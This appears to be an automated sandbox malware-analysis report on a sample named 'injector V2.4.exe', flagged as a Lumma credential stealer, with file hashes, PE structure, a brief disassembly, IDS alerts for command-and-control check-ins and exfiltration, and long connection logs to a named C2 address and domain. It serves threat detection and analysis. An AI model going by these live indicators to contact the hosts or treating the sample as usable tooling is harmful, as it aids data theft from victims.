                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:7
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:injector V2.4.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@6/0@1/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 82%
                                                                                • Number of executed functions: 31
                                                                                • Number of non-executed functions: 121
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target injector V2.4.exe, PID 3720 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: injector V2.4.exe
                                                                                TimeTypeDescription
                                                                                10:52:00API Interceptor8x Sleep call for process: injector V2.4.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                172.67.219.199Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  fumblingactor.cyouLoader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSinjector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.43.198
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.66.38
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.209.48
                                                                                  Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.41.74
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 162.159.61.3
                                                                                  http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.6.188
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.66.38
                                                                                  VMX.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.198.61
                                                                                  Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.15.40
                                                                                  https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.86.42
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.219.199
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  VMX.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  Hexium.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  BlazeVaze.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  ExL4unch#U20ac#U00ae.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.219.199
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.6938188325289145
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:injector V2.4.exe
                                                                                  File size:587'904 bytes
                                                                                  MD5:837840f37e344f8e7bc187f88f93c4a8
                                                                                  SHA1:782edf606d07812ec71254cc9cf2260da2e3fd51
                                                                                  SHA256:02ec8860240f90b920bb2692f651d0ec712e511e0bd17a3b1048382fdfdcb4d8
                                                                                  SHA512:025068c49129a0d40235a9c80b6473e86b4d1209fabe953ac425628ad98e3b64106777014b5c20d24324991618d901c662feb69dc76cd7f68f39e415887c8480
                                                                                  SSDEEP:12288:SRgyqSwAN2kLkjnP13tGIGef4cDDKeCxeAn3tCk9Rj71Mlr7v:ig2N2kLkTd3AIGFcDtSVvCr7v
                                                                                  TLSH:6EC4D0165241E893F88728FF39A2A31334E63372B7B1CDD3C075796897801C195EAD6E
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....2?g.................V........................@.......................................@.................................T...(..
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4292c0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x673F321B [Thu Nov 21 13:14:03 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:3a33a82bcd5969a5b19ce5fba049e5b4
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before, Not After
                                                                                  • 30/08/2023 20:00:00 30/08/2026 19:59:59
                                                                                  Subject Chain
                                                                                  • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
                                                                                  Version:3
                                                                                  Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                  Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                  Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                  Serial:00D0461B529F67189D43744E9CEFE172AE
                                                                                  Instruction
                                                                                  call 00007FE994DE584Bh
                                                                                  jmp 00007FE994DE545Dh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push dword ptr [ebp+08h]
                                                                                  call 00007FE994DE55FFh
                                                                                  neg eax
                                                                                  pop ecx
                                                                                  sbb eax, eax
                                                                                  neg eax
                                                                                  dec eax
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  cmp dword ptr [0043E488h], FFFFFFFFh
                                                                                  push dword ptr [ebp+08h]
                                                                                  jne 00007FE994DE55F9h
                                                                                  call 00007FE994DE747Bh
                                                                                  jmp 00007FE994DE55FDh
                                                                                  push 0043E488h
                                                                                  call 00007FE994DE73FEh
                                                                                  pop ecx
                                                                                  neg eax
                                                                                  pop ecx
                                                                                  sbb eax, eax
                                                                                  not eax
                                                                                  and eax, dword ptr [ebp+08h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push 00000008h
                                                                                  push 0043C8E0h
                                                                                  call 00007FE994DE5B6Dh
                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                  mov eax, 00005A4Dh
                                                                                  cmp word ptr [00400000h], ax
                                                                                  jne 00007FE994DE564Fh
                                                                                  mov eax, dword ptr [0040003Ch]
                                                                                  cmp dword ptr [eax+00400000h], 00004550h
                                                                                  jne 00007FE994DE563Eh
                                                                                  mov ecx, 0000010Bh
                                                                                  cmp word ptr [eax+00400018h], cx
                                                                                  jne 00007FE994DE5630h
                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                  mov ecx, 00400000h
                                                                                  sub eax, ecx
                                                                                  push eax
                                                                                  push ecx
                                                                                  call 00007FE994DE5772h
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  test eax, eax
                                                                                  je 00007FE994DE5619h
                                                                                  cmp dword ptr [eax+24h], 00000000h
                                                                                  jl 00007FE994DE5613h
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  mov al, 01h
                                                                                  jmp 00007FE994DE5611h
                                                                                  mov eax, dword ptr [ebp-14h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  xor ecx, ecx
                                                                                  cmp dword ptr [eax], C0000005h
                                                                                  sete cl
                                                                                  mov eax, ecx
                                                                                  ret
                                                                                  mov esp, dword ptr [ebp-18h]
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3c0540x28.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x8ca000x2e80.coS
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x2608.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x371600xc0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x3c1980x11c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x3544c0x35600479743414830a5568bcada3f710e0c1aFalse0.49541221457845436data6.9570693373870895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x370000x5e440x6000fa3c2f19487ee30f8cd241552465a803False0.4083251953125data4.760675312198424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x3d0000x1ba40x1000ff4f8fd6963b4f7d1c08f13031fa0788False0.470703125OpenPGP Secret Key4.849894766585126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .00cfg0x3f0000x80x200056d58e83a0a9dfd46d11d226dee9030False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x400000x26080x280001d8884685c61e5615f1d070b294bafcFalse0.7767578125data6.602867365262165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  .coS0x430000x4d4000x4d400a33d850a0dd95b64501f12ccaf3b91d4False1.0003350020226538data7.999392363076688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  DLLImport
                                                                                  KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-21T16:51:59.946351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.219.199443TCP
                                                                                  2024-11-21T16:52:00.661859+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549710172.67.219.199443TCP
                                                                                  2024-11-21T16:52:00.661859+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549710172.67.219.199443TCP
                                                                                  2024-11-21T16:52:02.044217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711172.67.219.199443TCP
                                                                                  2024-11-21T16:52:02.776657+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549711172.67.219.199443TCP
                                                                                  2024-11-21T16:52:02.776657+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549711172.67.219.199443TCP
                                                                                  2024-11-21T16:52:04.519436+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.219.199443TCP
                                                                                  2024-11-21T16:52:06.697059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.219.199443TCP
                                                                                  2024-11-21T16:52:09.534774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714172.67.219.199443TCP
                                                                                  2024-11-21T16:52:12.576375+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.219.199443TCP
                                                                                  2024-11-21T16:52:13.294353+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549715172.67.219.199443TCP
                                                                                  2024-11-21T16:52:14.933335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.219.199443TCP
                                                                                  2024-11-21T16:52:14.962103+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549716172.67.219.199443TCP
                                                                                  2024-11-21T16:52:18.362746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549726172.67.219.199443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 21, 2024 16:51:58.620428085 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:51:58.620517969 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:51:58.620623112 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:51:58.621697903 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:51:58.621732950 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:51:59.946183920 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:51:59.946351051 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:51:59.955280066 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:51:59.955375910 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:51:59.955753088 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.000746965 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.011095047 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.011096001 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.011274099 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.661765099 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.661861897 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.661930084 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.663952112 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.663953066 CET49710443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.664019108 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.664057016 CET44349710172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.730468035 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.730580091 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:00.730658054 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.731067896 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:00.731118917 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.043999910 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.044217110 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.045319080 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.045351028 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.045696974 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.046920061 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.046962976 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.047024965 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776659966 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776709080 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776846886 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776889086 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776904106 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.776935101 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.776983976 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.777036905 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.777038097 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.777115107 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.785844088 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.785917997 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.785936117 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.794466019 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.794557095 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.794572115 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.844377995 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.896539927 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.938222885 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.938292980 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.985074997 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:02.987059116 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.987397909 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:02.987476110 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.158643961 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.158643961 CET49711443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.158723116 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:03.158818960 CET44349711172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:03.295933008 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.296041012 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:03.296202898 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.296493053 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:03.296531916 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:04.519198895 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:04.519435883 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:04.521171093 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:04.521203995 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:04.521569014 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:04.523251057 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:04.523464918 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:04.523515940 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:05.283188105 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:05.283348083 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:05.283422947 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:05.283521891 CET49712443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:05.283570051 CET44349712172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:05.403599977 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:05.403635979 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:05.403702021 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:05.404222012 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:05.404238939 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:06.696842909 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:06.697058916 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:06.698844910 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:06.698862076 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:06.699385881 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:06.701153994 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:06.701319933 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:06.701354980 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:06.701481104 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:06.743338108 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:07.503098011 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:07.503238916 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:07.503298044 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:07.517209053 CET49713443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:07.517230034 CET44349713172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:08.314604998 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:08.314661980 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:08.314739943 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:08.315109015 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:08.315121889 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:09.534620047 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:09.534774065 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:09.536379099 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:09.536427021 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:09.536756039 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:09.538294077 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:09.538496971 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:09.538533926 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:09.538614988 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:09.538647890 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:10.458415985 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:10.458538055 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:10.458617926 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:10.458929062 CET49714443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:10.458971977 CET44349714172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:11.288222075 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:11.288259029 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:11.288332939 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:11.288868904 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:11.288882017 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:12.576210022 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:12.576375008 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:12.577816963 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:12.577830076 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:12.578159094 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:12.579883099 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:12.579883099 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:12.579924107 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:13.294265032 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:13.294389963 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:13.294456005 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:13.294581890 CET49715443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:13.294603109 CET44349715172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:13.711402893 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:13.711509943 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:13.711635113 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:13.711946964 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:13.711978912 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.933218002 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.933335066 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.935029030 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.935060024 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.935349941 CET44349716172.67.219.199192.168.2.5
